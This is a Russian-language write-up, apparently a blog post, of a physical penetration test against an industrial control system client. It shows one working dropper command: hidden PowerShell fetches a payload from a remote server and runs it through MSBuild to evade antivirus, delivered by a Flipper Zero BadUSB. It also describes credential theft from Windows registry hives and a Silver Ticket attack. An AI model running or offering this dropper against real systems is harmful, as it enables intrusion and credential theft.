Взлом АСУТП
В сегодняшнем обсуждении мы сфокусируемся на анализе физического пентестинга автоматизированных систем управления технологическими процессами (АСУТП).
В рамках данного кейса, ключевым методом первичного проникновения будет применение BadUSB устройства. Отметим, что для сохранения конфиденциальности заказчика, все лица причастные к этому и сценарии действий в примере были изменены с сохранением ключевого смысла.
В процессе выполнения задачи, специалисту удалось успешно осуществить подключение BadUSB-устройства (в данном кейсе это был Flipper Zero) к компьютеру сотрудника ivanov_ii, что позволило получить удаленный доступ к системе с уровнем прав данного пользователя.
В качестве первого шага, специалист разработал и подготовил специализированный код, предназначенный для последующего выполнения на целевом компьютере.
Этап создания вредоносного кода направлен на установку удаленного соединения
При внедрении BadUSB-устройства в систему, следующий шаг процесса запускается автоматически и происходит с высокой скоростью. Данная операция, известная как действие дроппера, включает в себя загрузку ранее созданного вредоносного кода с удаленного сервера. Затем, с использованием встроенной утилиты MSBuild.exe операционной системы Windows, осуществляется инициация запуска кода. Процесс проходит незаметно: системные предупреждения не активируются, а программное обеспечение антивирусной защиты не фиксирует никаких нарушений.
powershell -w h -NoP -NonI -Ep Bypass -c "iwr http://125.125.125.125:8000/payload.xml -o C:\Users\Public\payload.xml; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Users\Public\payload.xml"
Затем, специалист успешно осуществил подключение BadUSB устройства к рабочему компьютеру сотрудника. В результате этого действия, в правом нижнем углу экрана автоматически активировалось исполнение комбинации клавиш "Win + R", что привело к запуску предварительно заданной команды (дроппер). Реализация данной атаки, занимавшая всего 4-5 секунд, позволила исполнителю получить удаленный доступ к системе под учетной записью сотрудника, на компьютере которого было произведено подключение.
Процесс подключения BadUSB устройства к компьютеру сотрудника инициировал запрос на скачивание вредоносного кода с удаленного HTTP-сервера специалиста.
В результате активации и выполнения вредоносного кода через BadUSB, специалисту удалось инициировать сессию под учетными данными пользователя ivanov_ii.
После успешного получения прав администратора на устройстве сотрудника ivanov_ii, специалисту удалось извлечь учетные данные для всех Wi-Fi сетей, к которым это устройство ранее подключалось, в том числе и к корпоративной сети заказчика под названием Corp_WiFi.
После успешной аутентификации с использованием пароля доменной учетной записи ivanov_ii и последующего подключения к удаленному рабочему столу сотрудника, специалист выявил наличие примонтированных файловых серверов в системном проводнике с полезной и конфедециальной информацией.
Но на этом не все ведь у нас есть в распоряжении целый ПК.
В ходе тщательно спланированных операций, специалисту удалось обеспечить физический доступ к компьютеру сотрудника petrov_aa. Отсутствие пароля на BIOS и шифрования дисков открыло двери для беспрепятственной загрузки операционной системы Kali Linux, которая была специально подготовлена для этой задачи. Специалист смог смонтировать системный диск Windows и обеспечил доступ к критически важным доменным и локальным учетным записям, хранящимся на нем.
Первым шагом было выключение целевого компьютера и подключение флешки с Kali Linux. После входа в BIOS и активации опции загрузки с USB-устройств, флешка стала доступна в меню выбора приоритета загрузки, что позволило успешно загрузить Kali Linux на устройстве сотрудника.
С помощью инструмента GParted, специалист идентифицировал системный диск Windows, отформатированный в NTFS, и произвел его монтирование. Это действие открыло доступ к файловой системе Windows, где были обнаружены ключевые файлы конфигурации: SAM, SECURITY, SYSTEM, необходимые для дальнейшего извлечения учетных данных.
Доступ к этим файлам позволил специалисту извлечь ценные локальные и доменные учетные записи, обеспечив тем самым фундамент для последующих атак.
Интересным моментом стало обнаружение, что учетная запись администратора была отключена. Однако, благодаря доступу к доменной учетной записи, специалист реализовал атаку Silver Ticket, создав поддельный сервисный билет на сервис HOST с правами доменного администратора admin_ss. Это дало возможность для аутентификации по Kerberos с применением поддельного сервисного билета.
После успешной атаки, специалист изменил пароль локального администратора и активировал его учетную запись, что позволило успешно аутентифицироваться под новыми учетными данными.
Завершающим аккордом стало отключение учетной записи локального администратора и восстановление пароля администратора.
Еще больше интересных статей в моем ТГ канале: https://t.me/pro_pentest